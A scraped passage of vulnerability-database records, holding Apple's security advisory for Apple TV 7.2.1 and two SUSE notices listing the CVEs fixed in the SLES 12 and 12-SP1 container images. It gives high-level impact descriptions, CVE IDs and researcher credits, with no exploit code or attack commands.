"For the protection of our customers, Apple does not disclose, discuss, or confirm security issues until a full investigation has occurred and any necessary 
patches or releases are available. To learn more about Apple Product Security, see the [Apple Product Security](<https://www.apple.com/support/security/>) website.\n\nFor information about the Apple Product Security PGP Key, see [How to use the Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nWhere possible, [CVE IDs](<http://cve.mitre.org/about/>) are used to reference the vulnerabilities for further information.\n\nTo learn about other security updates, see [Apple security updates](<https://support.apple.com/kb/HT201222>).\n\n## Apple TV 7.2.1\n\n * **bootp**\n\nAvailable for: Apple TV (3rd generation)\n\nImpact: A malicious Wi-Fi network may be able to determine networks a device has previously accessed\n\nDescription: Upon connecting to a Wi-Fi network, iOS may have broadcast MAC addresses of previously accessed networks via the DNAv4 protocol. This issue was addressed through disabling DNAv4 on unencrypted Wi-Fi networks.\n\nCVE-ID\n\nCVE-2015-3778 : Piers O'Hanlon of Oxford Internet Institute, University of Oxford (on the EPSRC Being There project)\n\n * **CloudKit**\n\nAvailable for: Apple TV (3rd generation)\n\nImpact: A malicious application may be able to access the iCloud user record of a previously signed in user\n\nDescription: A state inconsistency existed in CloudKit when signing out users. This issue was addressed through improved state handling.\n\nCVE-ID\n\nCVE-2015-3782 : Deepkanwal Plaha of University of Toronto\n\n * **CFPreferences**\n\nAvailable for: Apple TV (3rd generation)\n\nImpact: A malicious app may be able to read other apps' managed preferences\n\nDescription: An issue existed in the third-party app sandbox. 
This issue was addressed by improving the third-party sandbox profile.\n\nCVE-ID\n\nCVE-2015-3793 : Andreas Weinlein of the Appthority Mobility Threat Team\n\n * **Code Signing**\n\nAvailable for: Apple TV (3rd generation)\n\nImpact: A malicious application may be able to execute unsigned code\n\nDescription: An issue existed that allowed unsigned code to be appended to signed code in a specially crafted executable file. This issue was addressed through improved code signature validation.\n\nCVE-ID\n\nCVE-2015-3806 : TaiG Jailbreak Team\n\n * **Code Signing**\n\nAvailable for: Apple TV (3rd generation)\n\nImpact: A specially crafted executable file could allow unsigned, malicious code to execute\n\nDescription: An issue existed in the way multi-architecture executable files were evaluated that could have allowed unsigned code to be executed. This issue was addressed through improved validation of executable files.\n\nCVE-ID\n\nCVE-2015-3803 : TaiG Jailbreak Team\n\n * **Code Signing**\n\nAvailable for: Apple TV (3rd generation)\n\nImpact: A local user may be able to execute unsigned code\n\nDescription: A validation issue existed in the handling of Mach-O files. This was addressed by adding additional checks.\n\nCVE-ID\n\nCVE-2015-3802 : TaiG Jailbreak Team\n\nCVE-2015-3805 : TaiG Jailbreak Team\n\n * **CoreMedia Playback**\n\nAvailable for: Apple TV (3rd generation)\n\nImpact: Viewing a maliciously crafted movie file may lead to an unexpected application termination or arbitrary code execution\n\nDescription: A memory corruption issue existed in CoreMedia Playback. This issue was addressed through improved memory handling.\n\nCVE-ID\n\nCVE-2015-5777 : Apple\n\nCVE-2015-5778 : Apple\n\n * **CoreText**\n\nAvailable for: Apple TV (3rd generation)\n\nImpact: Processing a maliciously crafted font file may lead to an unexpected application termination or arbitrary code execution\n\nDescription: A memory corruption issue existed in the processing of font files. 
This issue was addressed through improved input validation.\n\nCVE-ID\n\nCVE-2015-5755 : John Villamil (@day6reak), Yahoo Pentest Team \n\nCVE-2015-5761 : John Villamil (@day6reak), Yahoo Pentest Team\n\n * **DiskImages**\n\nAvailable for: Apple TV (3rd generation)\n\nImpact: Processing a maliciously crafted DMG file may lead to an unexpected application termination or arbitrary code execution with system privileges\n\nDescription: A memory corruption issue existed in parsing of malformed DMG images. This issue was addressed through improved memory handling.\n\nCVE-ID\n\nCVE-2015-3800 : Frank Graziano of the Yahoo Pentest Team\n\n * **FontParser**\n\nAvailable for: Apple TV (3rd generation)\n\nImpact: Processing a maliciously crafted font file may lead to an unexpected application termination or arbitrary code execution\n\nDescription: A memory corruption issue existed in the processing of font files. This issue was addressed through improved input validation.\n\nCVE-ID\n\nCVE-2015-3804 : Apple\n\nCVE-2015-5756 : John Villamil (@day6reak), Yahoo Pentest Team\n\nCVE-2015-5775 : Apple\n\n * **ImageIO**\n\nAvailable for: Apple TV (3rd generation)\n\nImpact: Processing a maliciously crafted .tiff file may lead to an unexpected application termination or arbitrary code execution\n\nDescription: A memory corruption issue existed in the processing of .tiff files. This issue was addressed through improved bounds checking.\n\nCVE-ID\n\nCVE-2015-5758 : Apple\n\n * **ImageIO**\n\nAvailable for: Apple TV (3rd generation)\n\nImpact: Parsing maliciously crafted web content may result in the disclosure of process memory\n\nDescription: An uninitialized memory access issue existed in ImageIO's handling of PNG images. 
This issue was addressed through improved memory initialization and additional validation of PNG images.\n\nCVE-ID\n\nCVE-2015-5781 : Michal Zalewski\n\n * **ImageIO**\n\nAvailable for: Apple TV (3rd generation)\n\nImpact: Parsing maliciously crafted web content may result in the disclosure of process memory\n\nDescription: An uninitialized memory access issue existed in ImageIO's handling of TIFF images. This issue is addressed through improved memory initialization and additional validation of TIFF images.\n\nCVE-ID\n\nCVE-2015-5782 : Michal Zalewski\n\n * **IOKit**\n\nAvailable for: Apple TV (3rd generation)\n\nImpact: Parsing a maliciously crafted plist may lead to an unexpected application termination or arbitrary code execution with system privileges\n\nDescription: A memory corruption existed in processing of malformed plists. This issue was addressed through improved memory handling.\n\nCVE-ID\n\nCVE-2015-3776 : Teddy Reed of Facebook Security, Patrick Stein (@jollyjinx) of Jinx Germany\n\n * **IOHIDFamily**\n\nAvailable for: Apple TV (3rd generation)\n\nImpact: A local user may be able to execute arbitrary code with system privileges\n\nDescription: A buffer overflow issue existed in IOHIDFamily. This issue was addressed through improved memory handling.\n\nCVE-ID\n\nCVE-2015-5774 : TaiG Jailbreak Team\n\n * **Kernel**\n\nAvailable for: Apple TV (3rd generation)\n\nImpact: A malicious application may be able to determine kernel memory layout\n\nDescription: An issue existed in the mach_port_space_info interface, which could have led to the disclosure of kernel memory layout. This was addressed by disabling the mach_port_space_info interface.\n\nCVE-ID\n\nCVE-2015-3766 : Cererdlong of Alibaba Mobile Security Team, @PanguTeam\n\n * **Kernel**\n\nAvailable for: Apple TV (3rd generation)\n\nImpact: A malicious application may be able to execute arbitrary code with system privileges\n\nDescription: An integer overflow existed in the handling of IOKit functions. 
This issue was addressed through improved validation of IOKit API arguments.\n\nCVE-ID\n\nCVE-2015-3768 : Ilja van Sprundel\n\n * **Libc**\n\nAvailable for: Apple TV (3rd generation)\n\nImpact: Processing a maliciously crafted regular expression may lead to an unexpected application termination or arbitrary code execution\n\nDescription: A memory corruption issue existed in the TRE library. This issue was addressed through improved memory handling.\n\nCVE-ID\n\nCVE-2015-3796 : Ian Beer of Google Project Zero\n\nCVE-2015-3797 : Ian Beer of Google Project Zero\n\nCVE-2015-3798 : Ian Beer of Google Project Zero\n\n * **Libinfo**\n\nAvailable for: Apple TV (3rd generation)\n\nImpact: A remote attacker may be able to cause unexpected application termination or arbitrary code execution\n\nDescription: A memory corruption issue existed in handling AF_INET6 sockets. This issue was addressed by improved memory handling.\n\nCVE-ID\n\nCVE-2015-5776 : Apple\n\n * **libpthread**\n\nAvailable for: Apple TV (3rd generation)\n\nImpact: A malicious application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue existed in handling syscalls. This issue was addressed through improved lock state checking.\n\nCVE-ID\n\nCVE-2015-5757 : Lufeng Li of Qihoo 360\n\n * **libxml2**\n\nAvailable for: Apple TV (3rd generation)\n\nImpact: Parsing a maliciously crafted XML document may lead to disclosure of user information\n\nDescription: A memory corruption issue existed in parsing of XML files. This issue was addressed through improved memory handling.\n\nCVE-ID\n\nCVE-2015-3807 : Michal Zalewski\n\n * **libxml2**\n\nAvailable for: Apple TV (3rd generation)\n\nImpact: Multiple vulnerabilities existed in libxml2 versions prior to 2.9.2, the most serious of which may allow a remote attacker to cause a denial of service\n\nDescription: Multiple vulnerabilities existed in libxml2 versions prior to 2.9.2. 
These were addressed by updating libxml2 to version 2.9.2.\n\nCVE-ID\n\nCVE-2012-6685 : Felix Groebert of Google\n\nCVE-2014-0191 : Felix Groebert of Google\n\nCVE-2014-3660 : Felix Groebert of Google\n\n * **libxpc**\n\nAvailable for: Apple TV (3rd generation)\n\nImpact: A malicious application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue existed in handling of malformed XPC messages. This issue was addressed through improved bounds checking.\n\nCVE-ID\n\nCVE-2015-3795 : Mathew Rowley\n\n * **libxslt**\n\nAvailable for: Apple TV (3rd generation)\n\nImpact: Processing maliciously crafted XML may lead to arbitrary code execution\n\nDescription: A type confusion issue existed in libxslt. This issue was addressed through improved memory handling.\n\nCVE-ID\n\nCVE-2015-7995 : puzzor\n\n * **Location Framework**\n\nAvailable for: Apple TV (3rd generation)\n\nImpact: A local user may be able to modify protected parts of the filesystem\n\nDescription: A symbolic link issue was addressed through improved path validation.\n\nCVE-ID\n\nCVE-2015-3759 : Cererdlong of Alibaba Mobile Security Team\n\n * **Office Viewer**\n\nAvailable for: Apple TV (3rd generation)\n\nImpact: Parsing maliciously crafted XML may lead to disclosure of user information\n\nDescription: An external entity reference issue existed in XML parsing. This issue was addressed through improved parsing.\n\nCVE-ID\n\nCVE-2015-3784 : Bruno Morisson of INTEGRITY S.A. \n\n * **QL Office**\n\nAvailable for: Apple TV (3rd generation)\n\nImpact: Parsing a maliciously crafted office document may lead to an unexpected application termination or arbitrary code execution\n\nDescription: A memory corruption issue existed in parsing of office documents. 
This issue was addressed through improved memory handling.\n\nCVE-ID\n\nCVE-2015-5773 : Apple\n\n * **Sandbox_profiles**\n\nAvailable for: Apple TV (3rd generation)\n\nImpact: A malicious app may be able to read other apps' managed preferences\n\nDescription: An issue existed in the third-party app sandbox. This issue was addressed by improving the third-party sandbox profile.\n\nCVE-ID\n\nCVE-2015-5749 : Andreas Weinlein of the Appthority Mobility Threat Team\n\n * **WebKit**\n\nAvailable for: Apple TV (3rd generation)\n\nImpact: Processing maliciously crafted web content may lead to an unexpected application termination or arbitrary code execution\n\nDescription: Multiple memory corruption issues existed in WebKit. These issues were addressed through improved memory handling.\n\nCVE-ID\n\nCVE-2015-3730 : Apple\n\nCVE-2015-3731 : Apple\n\nCVE-2015-3732 : Apple\n\nCVE-2015-3733 : Apple\n\nCVE-2015-3734 : Apple\n\nCVE-2015-3735 : Apple\n\nCVE-2015-3736 : Apple\n\nCVE-2015-3737 : Apple\n\nCVE-2015-3738 : Apple\n\nCVE-2015-3739 : Apple\n\nCVE-2015-3740 : Apple\n\nCVE-2015-3741 : Apple\n\nCVE-2015-3742 : Apple\n\nCVE-2015-3743 : Apple\n\nCVE-2015-3744 : Apple\n\nCVE-2015-3745 : Apple\n\nCVE-2015-3746 : Apple\n\nCVE-2015-3747 : Apple\n\nCVE-2015-3748 : Apple\n\nCVE-2015-3749 : Apple\n\n * **WebKit**\n\nAvailable for: Apple TV (3rd generation)\n\nImpact: Maliciously crafted web content may exfiltrate image data cross-origin\n\nDescription: Images fetched through URLs that redirected to a data:image resource could have been exfiltrated cross-origin. 
This issue was addressed through improved canvas taint tracking.\n\nCVE-ID\n\nCVE-2015-3753 : Antonio Sanso and Damien Antipa of Adobe\n\n * **WebKit**\n\nAvailable for: Apple TV (3rd generation)\n\nImpact: Maliciously crafted web content may trigger plaintext requests to an origin under HTTP Strict Transport Security\n\nDescription: An issue existed where Content Security Policy report requests would not honor HTTP Strict Transport Security (HSTS). The issue was addressed by applying HSTS to CSP.\n\nCVE-ID\n\nCVE-2015-3750 : Muneaki Nishimura (nishimunea)\n\n * **WebKit**\n\nAvailable for: Apple TV (3rd generation)\n\nImpact: Content Security Policy report requests may leak cookies\n\nDescription: Two issues existed in how cookies were added to Content Security Policy report requests. Cookies were sent in cross-origin report requests in violation of the standard. Cookies set during regular browsing were sent in private browsing. These issues were addressed through improved cookie handling.\n\nCVE-ID\n\nCVE-2015-3752 : Muneaki Nishimura (nishimunea)\n\n * **WebKit**\n\nAvailable for: Apple TV (3rd generation)\n\nImpact: Image loading may violate a website's Content Security Policy directive\n\nDescription: An issue existed where processing web content with video controls would load images nested in object elements in violation of the website's Content Security Policy directive. 
This issue was addressed through improved Content Security Policy enforcement.\n\nCVE-ID\n\nCVE-2015-3751 : Muneaki Nishimura (nishimunea)\n", "edition": 2, "modified": "2017-01-23T03:54:31", "published": "2017-01-23T03:54:31", "id": "APPLE:HT205795", "href": "https://support.apple.com/kb/HT205795", "title": "About the security content of Apple TV 7.2.1 - Apple Support", "type": "apple", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "suse": [{"lastseen": "2017-10-11T05:54:19", "bulletinFamily": "unix", "cvelist": ["CVE-2016-6262", "CVE-2017-7407", "CVE-2015-8388", "CVE-2016-8620", "CVE-2016-8623", "CVE-2017-9233", "CVE-2016-5420", "CVE-2016-9840", "CVE-2016-3705", "CVE-2016-1840", "CVE-2014-0191", "CVE-2016-8615", "CVE-2016-8616", "CVE-2015-5276", "CVE-2015-3210", "CVE-2015-2325", "CVE-2016-6261", "CVE-2016-8619", "CVE-2017-10685", "CVE-2016-6306", "CVE-2016-2183", "CVE-2016-2178", "CVE-2015-8391", "CVE-2016-6263", "CVE-2016-2108", "CVE-2016-9063", "CVE-2016-8618", "CVE-2016-1762", "CVE-2016-6302", "CVE-2016-5300", "CVE-2015-8395", "CVE-2016-7141", "CVE-2016-1834", "CVE-2017-11112", "CVE-2016-2177", "CVE-2014-7169", "CVE-2015-8382", "CVE-2016-3627", "CVE-2015-1283", "CVE-2014-6277", "CVE-2016-2105", "CVE-2016-9318", "CVE-2016-4483", "CVE-2016-2107", "CVE-2015-8386", "CVE-2014-6278", "CVE-2015-2327", "CVE-2017-9049", "CVE-2016-3075", "CVE-2016-8617", "CVE-2016-9842", "CVE-2016-7796", "CVE-2017-2616", "CVE-2016-0634", "CVE-2012-6702", "CVE-2015-3238", "CVE-2016-2180", "CVE-2016-1835", "CVE-2016-0787", "CVE-2016-1234", "CVE-2016-0718", "CVE-2016-6185", "CVE-2015-8392", "CVE-2016-4574", "CVE-2015-8389", "CVE-2016-2109", "CVE-2015-8380", "CVE-2016-2181", "CVE-2016-6304", "CVE-2016-4449", "CVE-2017-9048", "CVE-2014-8964", "CVE-2015-2059", "CVE-2017-11113", "CVE-2016-1283", "CVE-2016-6313", "CVE-2016-1837", "CVE-2016-6318", "CVE-2015-3622", "CVE-2016-4448", "CVE-2016-1238", "CVE-2015-8393", "CVE-2016-1838", "CVE-2016-3706", "CVE-2016-4429", 
"CVE-2016-2381", "CVE-2016-7543", "CVE-2017-1000101", "CVE-2016-8622", "CVE-2015-8853", "CVE-2014-7187", "CVE-2015-8394", "CVE-2016-4008", "CVE-2014-9770", "CVE-2015-3217", "CVE-2014-6271", "CVE-2017-7526", "CVE-2016-3191", "CVE-2017-1000366", "CVE-2016-1839", "CVE-2016-8624", "CVE-2015-8384", "CVE-2016-9843", "CVE-2017-9047", "CVE-2015-8948", "CVE-2014-7824", "CVE-2015-8842", "CVE-2016-9597", "CVE-2015-5218", "CVE-2016-6303", "CVE-2015-8383", "CVE-2017-1000100", "CVE-2015-8381", "CVE-2016-2182", "CVE-2016-5421", "CVE-2016-9586", "CVE-2015-5073", "CVE-2016-4447", "CVE-2016-5011", "CVE-2015-7511", "CVE-2015-8385", "CVE-2015-8806", "CVE-2016-9841", "CVE-2016-4579", "CVE-2015-0245", "CVE-2016-2037", "CVE-2016-2073", "CVE-2016-5419", "CVE-2015-2328", "CVE-2017-6507", "CVE-2016-4658", "CVE-2016-7167", "CVE-2017-10684", "CVE-2016-2179", "CVE-2016-2106", "CVE-2016-1833", "CVE-2015-8387", "CVE-2016-8621", "CVE-2015-8390", "CVE-2017-9050"], "description": "The SUSE Linux Enterprise Server 12 container image has been updated to\n include security and stability fixes.\n\n The following issues related to building of the container images have been\n fixed:\n\n - Included krb5 package to avoid the inclusion of krb5-mini which gets\n selected as a dependency by the Build Service solver. (bsc#1056193)\n - Do not install recommended packages when building container images.\n (bsc#975726)\n\n A number of security issues that have been already fixed by updates\n released for SUSE Linux Enterprise Server 12 are now included in the base\n image. 
A package/CVE cross-reference is available below.\n\n pam:\n\n - CVE-2015-3238\n\n libtasn1:\n\n - CVE-2015-3622\n - CVE-2016-4008\n\n libidn:\n\n - CVE-2015-2059\n - CVE-2015-8948\n - CVE-2016-6261\n - CVE-2016-6262\n - CVE-2016-6263\n\n zlib:\n\n - CVE-2016-9840\n - CVE-2016-9841\n - CVE-2016-9842\n - CVE-2016-9843\n\n curl:\n\n - CVE-2016-5419\n - CVE-2016-5420\n - CVE-2016-5421\n - CVE-2016-7141\n - CVE-2016-7167\n - CVE-2016-8615\n - CVE-2016-8616\n - CVE-2016-8617\n - CVE-2016-8618\n - CVE-2016-8619\n - CVE-2016-8620\n - CVE-2016-8621\n - CVE-2016-8622\n - CVE-2016-8623\n - CVE-2016-8624\n - CVE-2016-9586\n - CVE-2017-1000100\n - CVE-2017-1000101\n - CVE-2017-7407\n\n openssl:\n\n - CVE-2016-2105\n - CVE-2016-2106\n - CVE-2016-2107\n - CVE-2016-2108\n - CVE-2016-2109\n - CVE-2016-2177\n - CVE-2016-2178\n - CVE-2016-2179\n - CVE-2016-2180\n - CVE-2016-2181\n - CVE-2016-2182\n - CVE-2016-2183\n - CVE-2016-6302\n - CVE-2016-6303\n - CVE-2016-6304\n - CVE-2016-6306\n\n libxml2:\n\n - CVE-2014-0191\n - CVE-2015-8806\n - CVE-2016-1762\n - CVE-2016-1833\n - CVE-2016-1834\n - CVE-2016-1835\n - CVE-2016-1837\n - CVE-2016-1838\n - CVE-2016-1839\n - CVE-2016-1840\n - CVE-2016-2073\n - CVE-2016-3627\n - CVE-2016-3705\n - CVE-2016-4447\n - CVE-2016-4448\n - CVE-2016-4449\n - CVE-2016-4483\n - CVE-2016-4658\n - CVE-2016-9318\n - CVE-2016-9597\n - CVE-2017-9047\n - CVE-2017-9048\n - CVE-2017-9049\n - CVE-2017-9050\n\n util-linux:\n\n - CVE-2015-5218\n - CVE-2016-5011\n - CVE-2017-2616\n\n cracklib:\n\n - CVE-2016-6318\n\n systemd:\n\n - CVE-2014-9770\n - CVE-2015-8842\n - CVE-2016-7796\n\n pcre:\n\n - CVE-2014-8964\n - CVE-2015-2325\n - CVE-2015-2327\n - CVE-2015-2328\n - CVE-2015-3210\n - CVE-2015-3217\n - CVE-2015-5073\n - CVE-2015-8380\n - CVE-2015-8381\n - CVE-2015-8382\n - CVE-2015-8383\n - CVE-2015-8384\n - CVE-2015-8385\n - CVE-2015-8386\n - CVE-2015-8387\n - CVE-2015-8388\n - CVE-2015-8389\n - CVE-2015-8390\n - CVE-2015-8391\n - CVE-2015-8392\n - CVE-2015-8393\n - 
CVE-2015-8394\n - CVE-2015-8395\n - CVE-2016-1283\n - CVE-2016-3191\n\n appamor:\n\n - CVE-2017-6507\n\n bash:\n\n - CVE-2014-6277\n - CVE-2014-6278\n - CVE-2016-0634\n - CVE-2016-7543\n\n cpio:\n\n - CVE-2016-2037\n\n glibc:\n\n - CVE-2016-1234\n - CVE-2016-3075\n - CVE-2016-3706\n - CVE-2016-4429\n - CVE-2017-1000366\n\n perl:\n\n - CVE-2015-8853\n - CVE-2016-1238\n - CVE-2016-2381\n - CVE-2016-6185\n\n libssh2_org:\n\n - CVE-2016-0787\n\n expat:\n\n - CVE-2012-6702\n - CVE-2015-1283\n - CVE-2016-0718\n - CVE-2016-5300\n - CVE-2016-9063\n - CVE-2017-9233\n\n ncurses:\n\n - CVE-2017-10684\n - CVE-2017-10685\n - CVE-2017-11112\n - CVE-2017-11113\n\n libksba:\n\n - CVE-2016-4574\n - CVE-2016-4579\n\n libgcrypt:\n\n - CVE-2015-7511\n - CVE-2016-6313\n - CVE-2017-7526\n\n dbus-1:\n\n - CVE-2014-7824\n - CVE-2015-0245\n\n Finally, the following packages received non-security fixes:\n\n - augeas\n - bzip2\n - ca-certificates-mozilla\n - coreutils\n - cryptsetup\n - cyrus-sasl\n - dirmngr\n - e2fsprogs\n - findutils\n - gpg2\n - insserv-compat\n - kmod\n - libcap\n - libsolv\n - libzypp\n - openldap2\n - p11-kit\n - permissions\n - procps\n - rpm\n - sed\n - shadow\n - zypper\n\n", "edition": 1, "modified": "2017-10-11T03:06:53", "published": "2017-10-11T03:06:53", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-10/msg00010.html", "id": "SUSE-SU-2017:2699-1", "title": "Security update for SLES 12 Docker image (important)", "type": "suse", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-10-11T05:54:20", "bulletinFamily": "unix", "cvelist": ["CVE-2016-6262", "CVE-2016-7056", "CVE-2017-7407", "CVE-2015-8388", "CVE-2016-8620", "CVE-2016-8623", "CVE-2017-9233", "CVE-2016-5420", "CVE-2016-9840", "CVE-2016-3705", "CVE-2016-1840", "CVE-2014-0191", "CVE-2016-8615", "CVE-2016-8616", "CVE-2015-5276", "CVE-2015-3210", "CVE-2015-2325", "CVE-2016-6261", "CVE-2016-8619", "CVE-2017-10685", 
"CVE-2016-6306", "CVE-2016-2183", "CVE-2015-0860", "CVE-2016-2178", "CVE-2015-8391", "CVE-2016-6263", "CVE-2016-2108", "CVE-2016-9063", "CVE-2016-8618", "CVE-2016-1762", "CVE-2016-6302", "CVE-2016-5300", "CVE-2015-8395", "CVE-2016-7141", "CVE-2016-1834", "CVE-2017-11112", "CVE-2016-2177", "CVE-2014-7169", "CVE-2015-8382", "CVE-2016-3627", "CVE-2015-1283", "CVE-2014-6277", "CVE-2016-2105", "CVE-2016-9318", "CVE-2016-4483", "CVE-2016-2107", "CVE-2017-3731", "CVE-2015-8386", "CVE-2014-6278", "CVE-2015-2327", "CVE-2017-9049", "CVE-2016-3075", "CVE-2016-8617", "CVE-2016-9842", "CVE-2016-7796", "CVE-2017-2616", "CVE-2016-0634", "CVE-2012-6702", "CVE-2015-3238", "CVE-2016-2180", "CVE-2016-1835", "CVE-2016-0787", "CVE-2016-8610", "CVE-2016-1234", "CVE-2016-0718", "CVE-2016-6185", "CVE-2015-8392", "CVE-2016-4574", "CVE-2015-8389", "CVE-2016-2109", "CVE-2015-8380", "CVE-2016-2181", "CVE-2016-6304", "CVE-2016-4449", "CVE-2017-9048", "CVE-2014-8964", "CVE-2015-2059", "CVE-2017-11113", "CVE-2016-1283", "CVE-2016-6313", "CVE-2016-1837", "CVE-2016-6318", "CVE-2015-3622", "CVE-2016-4448", "CVE-2016-1238", "CVE-2015-8393", "CVE-2016-1838", "CVE-2016-3706", "CVE-2016-4429", "CVE-2016-2381", "CVE-2016-7543", "CVE-2017-1000101", "CVE-2016-8622", "CVE-2015-8853", "CVE-2014-7187", "CVE-2015-8394", "CVE-2016-4008", "CVE-2014-9770", "CVE-2015-3217", "CVE-2014-6271", "CVE-2017-7526", "CVE-2016-3191", "CVE-2017-1000366", "CVE-2016-1839", "CVE-2016-8624", "CVE-2015-8384", "CVE-2016-9843", "CVE-2017-9047", "CVE-2015-8948", "CVE-2014-7824", "CVE-2015-8842", "CVE-2016-9597", "CVE-2016-6303", "CVE-2015-8383", "CVE-2017-1000100", "CVE-2015-8381", "CVE-2016-2182", "CVE-2016-5421", "CVE-2016-9586", "CVE-2015-5073", "CVE-2016-4447", "CVE-2016-5011", "CVE-2015-7511", "CVE-2015-8385", "CVE-2015-8806", "CVE-2016-9841", "CVE-2016-4579", "CVE-2015-0245", "CVE-2016-2037", "CVE-2016-2073", "CVE-2016-5419", "CVE-2015-2328", "CVE-2017-6507", "CVE-2016-4658", "CVE-2016-7167", "CVE-2017-10684", 
"CVE-2016-2179", "CVE-2016-2106", "CVE-2016-1833", "CVE-2015-8387", "CVE-2016-8621", "CVE-2015-8390", "CVE-2017-9050"], "description": "The SUSE Linux Enterprise Server 12 SP1 container image has been updated\n to include security and stability fixes.\n\n The following issues related to building of the container images have been\n fixed:\n\n - Included krb5 package to avoid the inclusion of krb5-mini which gets\n selected as a dependency by the Build Service solver. (bsc#1056193)\n - Do not install recommended packages when building container images.\n (bsc#975726)\n\n A number of security issues that have been already fixed by updates\n released for SUSE Linux Enterprise Server 12 SP1 are now included in the\n base image. A package/CVE cross-reference is available below.\n\n pam:\n\n - CVE-2015-3238\n\n libtasn1:\n\n - CVE-2015-3622\n - CVE-2016-4008\n\n expat:\n\n expat:\n\n - CVE-2012-6702\n - CVE-2015-1283\n - CVE-2016-0718\n - CVE-2016-5300\n - CVE-2016-9063\n - CVE-2017-9233\n\n libidn:\n\n - CVE-2015-2059\n - CVE-2015-8948\n - CVE-2016-6261\n - CVE-2016-6262\n - CVE-2016-6263\n\n\n zlib:\n\n - CVE-2016-9840\n - CVE-2016-9841\n - CVE-2016-9842\n - CVE-2016-9843\n\n curl:\n\n - CVE-2016-5419\n - CVE-2016-5420\n - CVE-2016-5421\n - CVE-2016-7141\n - CVE-2016-7167\n - CVE-2016-8615\n - CVE-2016-8616\n - CVE-2016-8617\n - CVE-2016-8618\n - CVE-2016-8619\n - CVE-2016-8620\n - CVE-2016-8621\n - CVE-2016-8622\n - CVE-2016-8623\n - CVE-2016-8624\n - CVE-2016-9586\n - CVE-2017-1000100\n - CVE-2017-1000101\n - CVE-2017-7407\n\n openssl:\n\n - CVE-2016-2105\n - CVE-2016-2106\n - CVE-2016-2107\n - CVE-2016-2108\n - CVE-2016-2109\n - CVE-2016-2177\n - CVE-2016-2178\n - CVE-2016-2179\n - CVE-2016-2180\n - CVE-2016-2181\n - CVE-2016-2182\n - CVE-2016-2183\n - CVE-2016-6302\n - CVE-2016-6303\n - CVE-2016-6304\n - CVE-2016-6306\n - CVE-2016-7056\n - CVE-2016-8610\n - CVE-2017-3731\n\n cracklib:\n\n - CVE-2016-6318\n\n pcre:\n\n - CVE-2014-8964\n - CVE-2015-2325\n - 
CVE-2015-2327\n - CVE-2015-2328\n - CVE-2015-3210\n - CVE-2015-3217\n - CVE-2015-5073\n - CVE-2015-8380\n - CVE-2015-8381\n - CVE-2015-8382\n - CVE-2015-8383\n - CVE-2015-8384\n - CVE-2015-8385\n - CVE-2015-8386\n - CVE-2015-8387\n - CVE-2015-8388\n - CVE-2015-8389\n - CVE-2015-8390\n - CVE-2015-8391\n - CVE-2015-8392\n - CVE-2015-8393\n - CVE-2015-8394\n - CVE-2015-8395\n - CVE-2016-1283\n - CVE-2016-3191\n\n apparmor:\n\n - CVE-2017-6507\n\n bash:\n\n - CVE-2014-6277\n - CVE-2014-6278\n - CVE-2016-0634\n - CVE-2016-7543\n\n cpio:\n\n - CVE-2016-2037\n\n glibc:\n\n - CVE-2016-1234\n - CVE-2016-3075\n - CVE-2016-3706\n - CVE-2016-4429\n - CVE-2017-1000366\n\n perl:\n\n - CVE-2015-8853\n - CVE-2016-1238\n - CVE-2016-2381\n - CVE-2016-6185\n\n libssh2_org:\n\n - CVE-2016-0787\n\n util-linux:\n\n - CVE-2016-5011\n - CVE-2017-2616\n\n ncurses:\n\n - CVE-2017-10684\n - CVE-2017-10685\n - CVE-2017-11112\n - CVE-2017-11113\n\n libksba:\n\n - CVE-2016-4574\n - CVE-2016-4579\n\n libxml2:\n\n - CVE-2014-0191\n - CVE-2015-8806\n - CVE-2016-1762\n - CVE-2016-1833\n - CVE-2016-1834\n - CVE-2016-1835\n - CVE-2016-1837\n - CVE-2016-1838\n - CVE-2016-1839\n - CVE-2016-1840\n - CVE-2016-2073\n - CVE-2016-3627\n - CVE-2016-3705\n - CVE-2016-4447\n - CVE-2016-4448\n - CVE-2016-4449\n - CVE-2016-4483\n - CVE-2016-4658\n - CVE-2016-9318\n - CVE-2016-9597\n - CVE-2017-9047\n - CVE-2017-9048\n - CVE-2017-9049\n - CVE-2017-9050\n\n libgcrypt:\n\n - CVE-2015-7511\n - CVE-2016-6313\n - CVE-2017-7526\n\n update-alternatives:\n\n - CVE-2015-0860\n\n systemd:\n\n - CVE-2014-9770\n - CVE-2015-8842\n - CVE-2016-7796\n\n dbus-1:\n\n - CVE-2014-7824\n - CVE-2015-0245\n\n Finally, the following packages received non-security fixes:\n\n - augeas\n - bzip2\n - ca-certificates-mozilla\n - coreutils\n - cryptsetup\n - cyrus-sasl\n - dirmngr\n - e2fsprogs\n - findutils\n - gpg2\n - insserv-compat\n - kmod\n - libcap\n - libsolv\n - libzypp\n - lua51\n - lvm2\n - netcfg\n - p11-kit\n - permissions\n - 
procps\n - rpm\n - sed\n - sg3_utils\n - shadow\n - zypper\n\n", "edition": 1, "modified": "2017-10-11T03:07:32", "published": "2017-10-11T03:07:32", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-10/msg00011.html", "id": "SUSE-SU-2017:2700-1", "title": "Security update for SLES 12-SP1 Docker image (important)", "type": "suse", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}